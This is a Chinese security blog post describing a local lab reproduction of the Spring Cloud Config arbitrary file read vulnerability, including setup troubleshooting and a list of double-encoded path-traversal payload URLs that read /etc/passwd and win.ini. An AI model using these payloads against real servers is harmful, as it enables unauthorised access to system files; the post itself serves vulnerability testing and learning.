微慑信息网

spring cloud config任意文件读取测试

1、下载对应psring cloud config 有漏洞的版本:

https://github.com/spring-cloud/spring-cloud-config/releases

Spring Cloud Config 2.1.0 to 2.1.1

Spring Cloud Config 2.0.0 to 2.0.3

Spring Cloud Config 1.4.0 to 1.4.5

 

2、下载后,idea加载,maven部署:

由于本身对java spring不熟悉,加载后我直接运行了”run”

但是始终提示报错:

2019-07-16 23:37:15.984 INFO 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Fetching config from server at: http://localhost:8888
2019-07-16 23:37:17.175 WARN 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Could not locate PropertySource: I/O error on GET request for “http://localhost:8888/bar/default”: Connection refused: connect; nested exception is java.net.ConnectException: Connection refused: connect

网上查了很多资料,都说是配置问题,后来问了SN,可能原因是运行的模块不对,因为测试的是server端的漏洞,

(1)按照官网:

(2)或者在idea中选中\spring-cloud-config-server\src\main\java\org\springframework\cloud\config\server\ConfigServerApplication.java

点击运行:

测试查看:

已经没有了warnning,但最下面会有tomcat的错误,不影响,具体什么原因我也不知道:

java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:428) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:687) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1468) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_191]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_191]
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_191]

测试访问http://127.0.0.1:8888/admin/info,正常

访问http://127.0.0.1:8888/admin/env,提示401:

401是认证问题,翻查了下,需要修改文件:

\spring-cloud-config-1.4.4.RELEASE\spring-cloud-config-server\src\main\resources\configserver.yml

默认如下:

 

management节点下添加:

修改后为:

 

在重新运行,正常:

 

 

(3)测试任意文件读取:

设置Accept: text/html,application/xhtml+xml,application/xml;q=0.9,application/octet-stream,image/webp,image/apng,*/*;q=0.8

主要payload:

http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini
http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini
http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a

检测脚本:

参考c0ny1大佬在gv7.me的分析,

拓展阅读(点评/知识):

可参考:

http://www.lmxspace.com/2019/04/26/Spring-Cloud-Config-Server-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%88%86%E6%9E%90/

http://gv7.me/articles/2019/write-cve-2019-3799-batch-scan-script/

截图如下

 

本文标题:spring cloud config任意文件读取测试
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/0716_8385.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » spring cloud config任意文件读取测试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们